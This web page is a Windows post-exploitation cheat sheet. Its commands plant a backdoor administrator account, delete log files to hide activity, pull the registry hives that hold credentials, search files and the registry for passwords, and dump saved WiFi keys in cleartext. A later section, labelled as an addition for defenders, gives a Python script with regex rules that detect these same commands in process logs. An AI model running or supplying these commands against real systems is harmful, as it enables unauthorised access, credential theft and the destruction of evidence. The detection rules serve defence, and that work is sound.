The Complete List of Windows Post-Exploitation Commands (No PowerShell)
  • I WAS VERY PUSHED FOR TIME TODAY, I HAVE A LOT MORE TO ADD SO PLEASE KEEP CHECKING AS THIS WILL GROW AND GROW! I will also try and organise this better and add my smart recon scripts. ❤

Current User

whoami /all

On older machines, whoami might not be available, so to find out the current user try the following:

echo %username%

All Users

net user

Add User

net user hacker hack3d /add

Make User Admin

net localgroup administrators hacker /add

Remove User

net user hacker /del


type %SYSTEMDRIVE%\boot.ini
type %WINDIR%\win.ini
type %WINDIR%\System32\drivers\etc\hosts

Files to Pull

%WINDIR%\repair\software, %WINDIR%\repair\security

Host Information

fsutil fsinfo drives
net time
net file
net session
net use

If you are looking for kernel exploit targets, you can try using findstr like so…

driverquery | findstr Kernel


sc queryex type= service state= all
netstat -ano

Query a specific service:

sc query <SERVICE NAME>

Start a service:

sc start <SERVICE NAME>

Stop a service:

sc stop <SERVICE NAME>

Kill a Task

taskkill /f /pid 1337

List System Logs

wevtutil el

Delete Logs

del *.log /a /s /q /f

Scheduled Tasks

schtasks /query /fo LIST /v

Installed Software

wmic product get name /value

Uninstall Software

wmic product where name="<NAME>" call uninstall /INTERACTIVE:OFF

Search for Keywords (e.g. *pass*)

dir /s *pass* == *key* == *vnc* == *.config*

The same command also matches names containing key or vnc, and .config files.

Only inside certain file types…

findstr /si pass *.xml *.ini *.txt

Grep the registry…

reg query HKLM /f pass /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s

WiFi Cleartext Passwords

List the saved wireless profiles:

netsh wlan show profile

Get Cleartext Pass

netsh wlan show profile <SSID> key=clear
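As an added example for defenders, not part of the original cheat sheet: a small Python triage script that flags the commands listed on this page when they show up in process-creation command lines (Security event 4688 or Sysmon event 1). The event schema (host, user, cmd) and the sample telemetry are constructed for this example; map your own telemetry fields onto it. The patterns are loose on whitespace because cmd.exe accepts both `hacker/add` and `hacker /add`.

```python
"""Flag command lines matching the post-exploitation commands catalogued on
this page.  Added example for defenders; not part of the original cheat sheet.
Event layout (host/user/cmd) and all sample log lines are constructed."""
import re
from typing import Dict, List, Tuple

# Each rule: (label, compiled regex).  Case-insensitive, whitespace-tolerant.
RULES: List[Tuple[str, re.Pattern]] = [
    ("local account created",
     re.compile(r"\bnet(?:1)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("account added to Administrators",
     re.compile(r"\bnet(?:1)?\s+localgroup\s+administrators\b.*?/add\b", re.I)),
    ("local account deleted",
     re.compile(r"\bnet(?:1)?\s+user\s+\S+\s+/del(?:ete)?\b", re.I)),
    ("bulk log deletion",
     re.compile(r"\bdel\b.*\*\.log\b.*(?:/s\b|/q\b)", re.I)),
    ("event log enumeration or clearing",
     re.compile(r"\bwevtutil\s+(?:el|cl)\b", re.I)),
    ("WLAN key export",
     re.compile(r"\bnetsh\s+wlan\s+show\s+profile\b.*\bkey\s*=\s*clear\b", re.I)),
    ("registry credential search",
     re.compile(r"\breg\s+query\s+HK(?:LM|CU)\b.*/f\s+pass", re.I)),
    ("credential keyword file search",
     re.compile(r"\bfindstr\s+/si\s+pass\b", re.I)),
]


def classify(command_line: str) -> List[str]:
    """Return the labels of every rule the command line matches (empty = no hit)."""
    return [label for label, rx in RULES if rx.search(command_line)]


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run each event through classify() and return only the events that hit.

    Each event is a dict with 'host', 'user' and 'cmd' keys (constructed schema)."""
    hits = []
    for ev in events:
        tags = classify(ev["cmd"])
        if tags:
            hits.append({"host": ev["host"], "user": ev["user"],
                         "cmd": ev["cmd"], "tags": tags})
    return hits


# Constructed sample telemetry: the page's commands mixed with benign noise.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jsmith", "cmd": "whoami /all"},
    {"host": "WS01", "user": "CORP\\jsmith", "cmd": "net user hacker hack3d /add"},
    {"host": "WS01", "user": "CORP\\jsmith", "cmd": "net localgroup administrators hacker/add"},
    {"host": "WS02", "user": "CORP\\svc_backup", "cmd": "del *.log /a /s /q /f"},
    {"host": "WS02", "user": "CORP\\svc_backup", "cmd": "netsh wlan show profile HomeNet key=clear"},
    {"host": "WS03", "user": "CORP\\helpdesk", "cmd": "reg query HKLM /f pass /t REG_SZ /s"},
    {"host": "WS03", "user": "CORP\\helpdesk", "cmd": "net user"},
    {"host": "WS03", "user": "CORP\\helpdesk", "cmd": "ipconfig /all"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['host']} {hit['user']}: {', '.join(hit['tags'])} <- {hit['cmd']}")
```

Note that plain `net user` and `netsh wlan show profile` (without `key=clear`) are deliberately left unflagged: enumeration alone is common in administrative scripts, whereas account creation, privilege changes, log deletion and key export are the steps worth paging on.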